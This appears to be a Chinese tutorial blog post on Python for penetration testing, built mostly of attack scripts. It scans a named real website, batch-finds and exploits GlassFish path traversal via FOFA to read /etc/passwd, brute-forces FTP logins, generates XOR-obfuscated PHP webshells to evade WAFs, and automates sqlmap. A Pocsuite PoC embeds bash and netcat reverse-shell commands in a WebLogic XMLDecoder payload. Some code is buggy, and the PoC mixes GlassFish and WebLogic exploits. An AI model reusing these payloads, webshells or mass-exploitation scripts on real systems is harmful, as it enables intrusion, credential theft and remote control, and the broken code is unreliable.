python开发
Python 开发相关知识点:
1.开发基础环境配置说明
Windows10+Pycharm
2.Python 开发学习的意义
- 学习相关安全工具原理
- 掌握自定义工具及拓展开发
- 解决实战中无工具或手工麻烦批量化等情况
- 在二次开发 Bypass,日常任务,批量测试利用等方面均有帮助
如:SRC 批量收集并利用,AWD 批量利用获取 FLAG,CTF 加解密脚本等
3.本篇直播涉及的技术方向
Socket,爬虫,正则表达式,框架开发等
基础环境安装
1、环境搭建
Pycharm 安装教程(pojie 版)
https://zhuanlan.zhihu.com/p/379280063
Pycharm 安装好用得插件
https://www.bilibili.com/video/BV1ZV411p7H8?from=search&seid=11507145613954022433
2、安装库
方法① 命令行安装:pip install 库名
方法② pycharm 安装:文件-设置-项目-python 解释器-点击+号即可安装
Python 开发-内外网收集 Socket&子域名&DNS
Socket 部分技术,进程命令执行,交互参数执行,NMAP 工具模块使用,异常处理等
脚本使用场景之一:src脚本挖掘思维导图
进行漏洞挖掘时,可用全自动化脚本。
演示案例
IP&Whois&系统指纹获取代码段-外网
CDN&子域名&端口扫描&交互代码段-外网
IP&计算机名&存活主机&端口扫描代码段-内网
Py 格式解析环境与可执行程序格式转换-Pyinstaller
外网代码集合
import socket,os
import time
from whois import whois
import sys
#域名反查IP地址
def ip_check(url):
ip = socket.gethostbyname(url)
print(ip)
#识别目标是否存在CDN
#采用nslookup执行结果进行返回IP解析数据判断
#利用python调用nslookup
#cdn_data = os.system('nslookup www.xiaodi8.com') 实验室system可以执行命令,但是没有ip解析结果
#print(cdn_data)
def cdn_check(url):
cdn_data = os.popen('nslookup '+url).read()
print(cdn_data)
#由于ip地址是由x.x.x.x构造,那么就可以通过点数来判断是否存在cdn,>10就存在cdn
#为什么是10呢?因为nslookip还显示域名信息存在“点”,当然这种判定并不准确
print(cdn_data.count('.'))
#也可以加分支来直接显示是否存在cdn
if(cdn_data.count('.')>10):
print('存在CDN')
else:
print('不存在CDN')
#端口扫描
#1、原生自写socket协议tcp,udp扫描
#2、调用第三方massan,nmap等扫描
#3、调用系统工具脚本执行
def ports_check(url):
ports = {'80','1433','3306','8080',"9090",'8089','8888'}
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
for port in ports :
result = server.connect_ex((url,int(port)))
if result == 0:
print(port + ':open')
else:
print(port + ':close')
#whois查询
#第三方库进行whois查询也可以利用网络接口查询
#whois第三方库名是python-whois,安装whois库会报错
def whois_check(url):
who_data = whois('www.xiaodi8.com')
print(who_data)
#子域名查询
#1.利用字典记载爆破进行查询
#2.利用 bing 或第三方接口进行查询
def zym_check(url):
urls = url.replace('www','')
for zym_data in open('D:\BaiduNetdiskDownload\Python开发源码资料-小迪安全\day76\dic.txt'):#dic是子域名字典
zym_data = zym_data.replace('\n','')
url = zym_data+urls
try:
ip = socket.gethostbyname(url)
print(url + '|' + ip)
time.sleep(0,1)
except Exception as e:
pass
#主函数调用
if __name__ == '__main__':
#python参数形式执行
check = sys.argv[1]
url = sys.argv[2]
if check == '-all':
ip_check(url)
whois_check(url)
cdn_check(url)
ports_check(url)
zym_check(url)
调用执行
C:\Users\Administrator>python D:/Applications/PycharmProjects/untitled/test123.py -all www.xueersi.com
175.22.33.241
{
"domain_name": [
"XIAODI8.COM",
"xiaodi8.com"
],
"registrar": "Alibaba Cloud Computing (Beijing) Co., Ltd.",
"whois_server": "grs-whois.hichina.com",
"referral_url": null,
"updated_date": "2022-02-18 02:39:54",
"creation_date": "2016-02-27 08:38:04",
"expiration_date": "2023-02-27 08:38:04",
"name_servers": [
"DNS10.HICHINA.COM",
"DNS9.HICHINA.COM"
],
"status": "ok https://icann.org/epp#ok",
"emails": "DomainAbuse@service.aliyun.com",
"dnssec": "unsigned",
"name": null,
"org": null,
"address": null,
"city": null,
"state": "Hu Bei",
"zipcode": null,
"country": "CN"
}
非权威应答:
服务器: cache2.jljlptt.net.cn
Address: 202.98.5.68
名称: www.xueersi.com.w.cdngslb.com
Addresses: 175.22.33.244
139.215.235.242
175.22.33.240
139.215.235.239
175.22.33.238
175.22.33.242
175.22.33.248
139.215.235.238
175.22.33.243
175.22.33.239
139.215.235.244
139.215.235.241
139.215.235.248
139.215.235.240
175.22.33.241
139.215.235.243
Aliases: www.xueersi.com
61
存在CDN
3306:close
8888:close
80:open
9090:close
1433:close
8089:close
8080:close
g.xueersi.com|120.133.71.66
i.xueersi.com|139.215.163.240
m.xueersi.com|221.203.223.104
s.xueersi.com|124.250.103.66
t.xueersi.com|120.133.71.66
v.xueersi.com|139.215.163.242
z.xueersi.com|221.203.223.104
www.xueersi.com|175.22.33.241
mall.xueersi.com|111.160.44.230
mail.xueersi.com|119.57.80.133
api.xueersi.com|218.60.78.226
api2.xueersi.com|218.60.78.223
ai.xueersi.com|134.175.75.151
app.xueersi.com|42.177.85.239
book.xueersi.com|120.133.71.86
read.xueersi.com|123.57.247.141
static.xueersi.com|113.1.0.74
beta.xueersi.com|120.133.71.68
bbs.xueersi.com|212.129.229.215
crm.xueersi.com|120.133.71.88
login.xueersi.com|14.205.95.89
open.xueersi.com|120.133.71.68
passport.xueersi.com|124.250.103.66
vip.xueersi.com|203.107.33.189
en.xueersi.com|119.57.80.133
push.xueersi.com|120.133.71.74
admin.xueersi.com|139.215.163.240
huodong.xueersi.com|221.203.223.104
activity.xueersi.com|221.203.223.105
account.xueersi.com|120.133.71.66
video.xueersi.com|120.133.71.66
Traceback (most recent call last):
File "D:/Applications/PycharmProjects/untitled/test123.py", line 64, in zym_check
ip = socket.gethostbyname(url)
socket.gaierror: [Errno 11001] getaddrinfo failed
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "D:/Applications/PycharmProjects/untitled/test123.py", line 79, in <module>
ports_check(url)
File "D:/Applications/PycharmProjects/untitled/test123.py", line 64, in zym_check
ip = socket.gethostbyname(url)
KeyboardInterrupt
C:\Users\Administrator>
由于子域名扫描字典过,Ctrl c退出了
内网
python可以支持各种第三方库,如nmap模块
import nmap
#内网主机信息探针
#1.原生利用ping进行获取
#2.原生利用icmp,tcp,udp等协议获取
#3.利用第三方模块库nmap等加载扫描获取
def nmapscan():
nm = nmap.PortScanner()
try:
data=nm.scan(hosts='192.168.76.0/24', arguments='-T4 -F')
print(nm.all_hosts())
print(nm.csv())
print(data)
except Exception as err:
print("error")
if __name__ == '__main__':
nmapscan()
Pyinstaller
将python文件准换为其他可执行程序
https://blog.csdn.net/weixin_47540149/article/details/122930395
涉及资源:
https://www.jb51.net/softs/598504.html
https://www.cnblogs.com/csnd/p/11807823.html
https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ 提取码:xiao
https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取码:xiao
Python 开发-批量 Fofa&SRC 提取&POC 验证
本节知识点:
Request 爬虫技术,lxml 数据提取,异常护理,Fofa 等使用说明。
学习目的:
掌握利用公开或 0day 漏洞进行批量化的收集及验证脚本开发。
Python 开发-某漏洞 POC 验证批量脚本
Python 开发-Fofa 搜索结果提取采集脚本
漏洞说明:https://www.secpulse.com/archives/42277.html
案例一+案例二
1、漏洞信息
(1)漏洞名称:应用服务器 glassfish 任意文件读取
(2)漏洞 poc:
http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c 0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
注意:Linux 时读取/etc.passwd 文件,windows 则是其他文件,如 windows/win.ini
2、 编写思路
(1)实现功能:批量的验证是否存在 glassfish 任意文件读取漏洞
(2)实现思路:
①筛选出存在 glassfish 的服务器 IP
具体实现:>>>借助 fofa 搜索,搜索语法为"glassfish" && port="4848";
>>>通过爬虫爬取 fofa 搜索的全部结果;
>>>通过 lxml 库提取爬取到的内容中的地址信息。
②批量验证存在 glassfish 的应用是否存在任意文件读取漏洞
两个 poc;分别对应 linux 和 windows 的
读取从 fofa 输出的结果,将漏洞 poc 中的地址进行替换,发起 get 请求,根据请求的响应状 态码来判断是否存在漏洞。
3、注意事项
①读取文件时 windows 和 Linux 下的文件是不同的
②爬虫爬取 fofa 的输出结果编码成 utf-8,看起来更容易
③爬取 fofa 后面的内容时,需要将登录的 cookie 信息放入请求头中,cookie 从浏览器中获 取
4、涉及知识点
(1)request 相关
requests 模块
Request 支持 HTTP 连接保持和连接池,支持使用 cookie 保持会话,支持文件上 传,支持自动响应内容的编码,支持国际化的 URL 和 POST 数据自动编码;使用 Requests 可以完成浏览器可有的任何操作
r.status_code #获取响应状态码
r.url #获取
url r.content #获取内容以二进制文本显示
r.text #获取到的内容以 text 文本形式显示
r.request.headers #请求头的信息
r.headers #响应头信息
r.cookies #获取 cookie
(2)文件读取
①参数:
w:写入模式;如果文件已经存在,清空文件内容;如果不存在,创建文件
x:写入模式;如果文件已经存在,抛出异常;如果不存在,创建文件并写入内容
a:追加模式;不覆盖文件的原始内容
②函数
f.write('hello') 写入 hello
f.close() 关闭文件
f.strip() 去掉换行(否则在读取文件内容并显示的时候, 每一行都会有多余的换行)
f.read(10) 读取 10 个字节
f.readline() 读取一行(也可以跟数字)
5、实现代码
import requests
import base64
from lxml import etree
import time
import sys
'''
url='http://186.202.17.69:4848/'
payload_linux='/'
payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
#data_linux=requests.get(url+payload_linux) #获取请求后的返回源代码
#data_windows=requests.get(url+payload_windows) #获取请求后的返回源代码
data_linux=requests.get(url+payload_linux).status_code #获取请求后的返回状态码
data_windows=requests.get(url+payload_windows).status_code #获取请求后的返回状态码
if data_linux==200 or data_windows==200:
print("yes")
else:
print("no")
#print(data_linux.content.decode('utf-8'))
#print(data_windows.content.decode('utf-8'))
'''
'''
如何实现这个漏洞批量化:
1.获取到可能存在漏洞的地址信息-借助Fofa进行获取目标
1.2 将请求的数据进行筛选
2.批量请求地址信息进行判断是否存在-单线程和多线程
'''
#第1页
#https://fofa.so/result?_=1608294544861&page=2&per_page=10&qbase64=ImdsYXNzZmlzaCIgJiYgcG9ydD0iNDg0OCI%3D
def fofa_search(search_data,page):
#search_data='"glassfish" && port="4848" && country="CN"'
headers={
'cookie':'_fofapro_ars_session=01148af6062a060ccd5dd9a8483f5fea;result_per_page=20',
}
for yeshu in range(1,page+1):
url='https://fofa.so/result?page='+str(yeshu)+'&qbase64='
search_data_bs=str(base64.b64encode(search_data.encode("utf-8")), "utf-8")
urls=url+search_data_bs
try:
print('正在提取第' + str(yeshu) + '页')
result=requests.get(urls,headers=headers).content
#print(result.decode('utf-8'))
soup = etree.HTML(result)
ip_data=soup.xpath('//div[@class="re-domain"]/a[@target="_blank"]/@href')
ipdata='\n'.join(ip_data)
print(ip_data)
with open(r'ip.txt','a+') as f:
f.write(ipdata+'\n')
f.close()
time.sleep(0.5)
except Exception as e:
pass
def check_vuln():
payload_linux='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
for ip in open('C:\Users\86135\Desktop\ip.txt'):
ip=ip.replace('\n','')
windows_url=ip+payload_windows
linxu_url=ip+payload_linux
try:
vuln_code_l=requests.get(linxu_url).status_code
vuln_code_w=requests.get(windows_url).status_code
print("check->"+ip)
if vuln_code_l==200 or vuln_code_w ==200:
with open(r'vuln.txt','a+') as f:
f.write(ip)
f.close()
time.sleep(0.5)
except Exception as e:
pass
if __name__ == '__main__':
search=sys.argv[1]
page=sys.argv[2]
fofa_search(search,int(page))
check_vuln()
Python 开发-教育 SRC 报告平台信息提取脚本
相关脚本代码见下面涉及资源的网盘打包文件中
案例 3-SRC 报告平台信息提取脚本为后续 SRC 课程思路做准备
使用爬虫爬取页面信息,通过 lxml 提取漏洞信息
读取 10 页的漏洞信息
import requests,time
from lxml import etree
def edu_list(page):
for page in range(1,page+1):
try:
url='https://src.sjtu.edu.cn/list/?page='+str(page)
data=requests.get(url).content
#print(data)
soup = etree.HTML(data.decode('utf-8'))
result = soup.xpath('//td[@class=""]/a/text()')
#print(result)
results = '\n'.join(result)
resultss=results.split()
print(resultss)
for edu in resultss:
with open(r'src.txt', 'a+',encoding='utf-8') as f:
f.write(edu+'\n')
f.close()
except Exception as e:
time.sleep(0.5)
pass
if __name__ == '__main__':
edu_list(10)
涉及资源:
https://fofa.so/
https://src.sjtu.edu.cn/
https://www.secpulse.com/archives/42277.html
https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ 提取码:
xiao
Python 开发-多线程 Fuzz&Waf 异或免杀&爆破
本节知识点:
协议模块使用,Request 爬虫技术,简易多线程技术,编码技术,Bypass 后门技术
学习目的:
掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合 Fuzz 吊打 WAF等
案例 1-Python 开发-简单多线程技术实现脚本
queue,threading 模块使用
案例 2-Python 开发-利用 FTP 模块实现协议爆破脚本
1.ftplib 模块使用
2.遍历用户及密码字典
3.尝试连接执行命令判断
思路
需要的参数
IP;端口;用户名;密码字典 (fuzz 字典)
案例 1,ftp 爆破登录
1、思路
(1)连接 ftp 服务需要输入的内容(参数)有:
①连接的 IP
②端口(默认 22)
③用户名 ④密码(字典)
(2)实现
使用 python 的 ftplib 模块可实现 ftp 登录,登入输入参数,IP;端口;用户名;密码。在未知密码时,通过 ftp 密码字典去爆破即可。
2、涉及知识点
(1)ftplib 模块的使用
①ftp 接口说明
ftp 常用函数
(2)python多线程
用法详解
https://blog.csdn.net/briblue/article/details/85101144
https://www.cnblogs.com/j6-2/p/4645490.html
3、案例1+案例2
import ftplib
import sys
import threading
import queue
#简单模拟登录测试
#爆破:IP,端口,用户名,密码字典
def ftp_brute(ip,port):
ftp = ftplib.FTP()
ftp.connect(ip, port)
while not q.empty():
dict = q.get()
dict = dict.split('|')
username = dict[0]
passwd = dict[1]
print(dict)
#print(username + '|' + passwd)
try:
ftp.login(usename, passwd)
ftp.retrlines('list')
print(username + '|' + passwd + '|ok')
except ftplib.all_errors:
pass
if __name__ == '__main__':
ip = sys.argv[1]
port = sys.argv[2]
userfile = sys.argv[3]
passfile = sys.argv[4]
threading_num = sys.argv[5]
q = queue.Queue()
for usename in open(userfile):
for passwd in open(passfile):
username = username.replace('\n','')
passwd = passwd.replace('\n','')
zidian = username + '|' + passwd
q.put(zidian)
print(zidian)
for x in range(int(threading_num)):
t = threading.Thread(target=ftp_brute(),args=(ip,int(port)))
t.start()
案例 3-Python 开发-配合 Fuzz 实现免杀异或 Shell 脚本
1.免杀异或 Shell 原理讲解及开发思路(参考及举例:!^@,"^?等)
2.基于 Fuzz 思路生成大量 Payload 代码并有序命名写入网站文件中
3.基于多线程实现批量访问 Shell 文件并提交测试是否正常连接回显
1、php 异或
参考 https://blog.csdn.net/qq_41617034/article/details/104441032 资料
(1)免杀异或
异或一句话木马
<?php $a=(“!”^”@”).’ssert’;$a($_POST[x];?>
其原形为<?php assert($_POST[x]);?>
原理:!的 ASCII 为 33;@的 ASCII 为 64,二者的值转换成二进制,并且进行异或运算,得出 的二进制结果再转换成 ASCII,该值为 97,查询为 a
通过 fuzz 来生成免杀木马
思路:不看二进制的异或计算,列出所有 ASCII 值<127 的的组合(127x127),将这些组合放入一句话木马中,然后测试该 payload 是否成功,写入到网站根目录;发起 requests 请求, 看返回内容,能够执行的文件返回的内容和不能执行的文件返回的内容是不一样的
import requests
import time
import threading,queue
def string():
while not q.empty():
filename=q.get()
url = 'http://127.0.0.1:8081/x/' + filename
datas = {
'x': 'phpinfo();'
}
result = requests.post(url, data=datas).content.decode('utf-8')
if 'XIAODI-PC' in result:
print('check->'+filename+'->ok')
else:
print('check->'+filename+'->no')
time.sleep(1)
def shell_test_check():
url='http://127.0.0.1:8081/x/33xd64.php'
datas={
'x':'phpinfo();'
}
result=requests.post(url,data=datas).content.decode('utf-8')
print(result)
if 'XIAODI-PC' in result:
print('ok')
if __name__ == '__main__':
q=queue.Queue()
for i in range(33, 127):
for ii in range(33, 127):
payload = "'" + chr(i) + "'" + '^' + "'" + chr(ii) + "'"
code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
filename = str(i) + 'xd' + str(ii) + '.php'
q.put(filename)
with open('D:/phpstudy/PHPTutorial/WWW/x/' + filename, 'a') as f:
f.write(code)
f.close()
print('Fuzz文件生成成功')
for x in range(20):
t=threading.Thread(target=string)
t.start()
涉及资源
https://github.com/zhanye/fuzzdb
https://github.com/stemmm/fuzzDicts
https://www.cnblogs.com/liujizhou/p/11806497.html
https://www.cnblogs.com/kaituorensheng/p/4480512.html
https://blog.csdn.net/qq_41617034/article/details/104441032
https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ 提取码:xiao
Python 开发-sqlmapapi&Tamper&Pocsuite
本节知识点:
Request 爬虫技术,Sqlmap 深入分析,Pocsuite 分析,框架代码二次修改等
本节目的:
掌握安全工具的 API 接口开发利用,掌握优秀框架的二次开发插件引用等
案例 1-Sqlmap_Tamper 模块脚本编写绕过滤
案例 2-SqlmapAPI 调用实现自动化 SQL 注入安全检测
参考:https://www.freebuf.com/articles/web/204875.html
应用案例:前期通过信息收集拿到大量的 URL 地址,这个时候可以配合 SqlmapAPI 接口进行批量的 SQL
注入检测(SRC 挖掘)
开发当前项目过程:(利用 sqlmapapi 接口实现批量 URL 注入安全检测)
1.创建新任务记录任务 ID @get("/task/new")
2.设置任务 ID 扫描信息 @post("/option/<taskid>/set ")
3.开始扫描对应 ID 任务 @post("/scan/<taskid>/start")
4.读取扫描状态判断结果 @get("/scan/<taskid>/status")
5.如果结束删除 ID 并获取结果 @get("/task/<taskid>/delete")
6.扫描结果查看@get("/scan/<taskid>/data")
import requests
import json
import time
def sqlmapapi(url):
headers = {
'Content-Type': 'application/json'
}
scan_url={
'url':url
}
scan_task_url='http://127.0.0.1:8775/task/new'
scan_task=requests.get(scan_task_url)
#print(scan_task.json())
scan_task_id=scan_task.json()['taskid']
#print(scan_task_id)
if 'success' in scan_task.content.decode('utf-8'):
print('sqlmapapi task create success...')
scan_task_set_url = 'http://127.0.0.1:8775/option/' + scan_task_id + '/set'
scan_task_set = requests.post(scan_task_set_url,data=json.dumps(scan_url),headers=headers)
#print(scan_url)
#print(scan_task_set.content.decode('utf-8'))
if 'success' in scan_task_set.content.decode('utf-8'):
print('sqlmapapi taskid set success')
scan_start_url='http://127.0.0.1:8775/scan/'+scan_task_id+'/start'
scan_start=requests.post(scan_start_url,data=json.dumps(scan_url),headers=headers)
#print(scan_start.content.decode('utf-8'))
if 'success' in scan_start.content.decode('utf-8'):
print('sqlmapapi scan start success')
while 1:
scan_status_url = 'http://127.0.0.1:8775/scan/' + scan_task_id + '/status'
scan_status = requests.get(scan_status_url)
#print(scan_status.content.decode('utf-8'))
if 'running' in scan_status.content.decode('utf-8'):
print(url + '->scan running')
pass
else:
print('sqlmapapi scan end')
scan_data_url='http://127.0.0.1:8775/scan/' + scan_task_id + '/data'
scan_data=requests.get(scan_data_url).content.decode('utf-8')
with open(r'scan_result.txt','a+') as f:
f.write(url+'\n')
f.write(scan_data+'\n')
f.write('==========python sqlmapapi by xiaodi=========='+'\n')
f.close()
#print('delete taskid')
scan_deltask_url = 'http://127.0.0.1:8775/task/' + scan_task_id + '/delete'
scan_deltask=requests.get(scan_deltask_url)
if 'success' in scan_deltask.content.decode('utf-8'):
print('delete taskid success')
break
time.sleep(3)
if __name__ == '__main__':
print("scanurl checking ok.....")
for url in open('url.txt'):
url=url.replace('\n','')
sqlmapapi(url)
案例 3-Pocsuite3 漏扫框架二次开发 POC/EXP 引入使用
参考:https://www.freebuf.com/articles/people/162868.html
开发当前项目过程:(利用已知框架增加引入最新或内部的 EXP 进行安全检测)
1.熟悉 Pocsuite3 项目使用及介绍
2.熟悉使用命令及代码文件对应情况
3.选取 Glassfish 漏洞进行编写测试
4.参考自带漏洞模版代码模仿写法测试
python cli.py -u x.x.x.x -r Glassfish.py --verify
"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
import re
from collections import OrderedDict
from urllib.parse import urljoin
from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.lib.utils import random_str
class DemoPOC(POCBase):
vulID = '97009' # ssvid
version = '3.0'
author = ['xiaodi']
vulDate = '2020-12-22'
createDate = '2020-12-22'
updateDate = '2020-12-22'
references = ['https://www.xiaodi8.com']
name = 'Glassfish任意文件读取漏洞'
appPowerLink = ''
appName = 'Glassfish'
appVersion = '< 10.3.6'
vulType = VUL_TYPE.CODE_EXECUTION
desc = '''
Glassfish任意文件读取漏洞将导致敏感数据泄露,进一步利用会造成权限丢失等安全隐患!
'''
samples = []
install_requires = ['']
category = POC_CATEGORY.EXPLOITS.REMOTE
def _options(self):
o = OrderedDict()
payload = {
"nc": "rm -f /tmp/p;mknod /tmp/p p && nc {0} {1} 0/tmp/p",
"bash": "bash -i >& /dev/tcp/{0}/{1} 0>&1",
}
o["command"] = OptDict(selected="bash", default=payload)
return o
def get_check_payload(self, lhost, lport, random_uri):
check_payload = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<object id="url" class="java.net.URL">
<string>http://{lhost}:{lport}/{random_uri}</string>
</object>
<object idref="url">
<void id="stream" method = "openStream" />
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
return check_payload.format(
lhost=lhost, lport=lport, random_uri=random_uri)
def _verify(self):
result={}
veri_url=self.url
payload='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
try:
#requests.post(veri_url, data=payload, headers=headers)
resp = requests.get(veri_url+payload)
print(resp.status_code)
#pattern = 'http://{0}(:{1})?/{2}'.format(check_host, check_port, random_uri)
if resp.status_code==200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
pass
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _attack(self):
return self._verify()
def get_shell_payload(self, cmd_base, cmd_opt, cmd_payload):
shell_payload = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>{cmd_base}</string>
</void>
<void index="1">
<string>{cmd_opt}</string>
</void>
<void index="2">
<string>{cmd_payload}</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
return shell_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt,
cmd_payload=cmd_payload)
def _shell(self):
vul_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType')
cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1'.format(
get_listener_ip(), get_listener_port())
shell_payload = self.get_shell_payload('/bin/bash', '-c', cmd)
headers = {
"Content-Type": "text/xml;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
}
try:
requests.post(vul_url, data=shell_payload, headers=headers)
except Exception as e:
logger.warn(str(e))
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(DemoPOC)
涉及资源:
http://sqlmap.org/
https://github.com/knownsec/pocsuite/
https://www.freebuf.com/articles/web/204875.html
https://www.freebuf.com/articles/people/162868.html
https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ 提取码:xiao
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
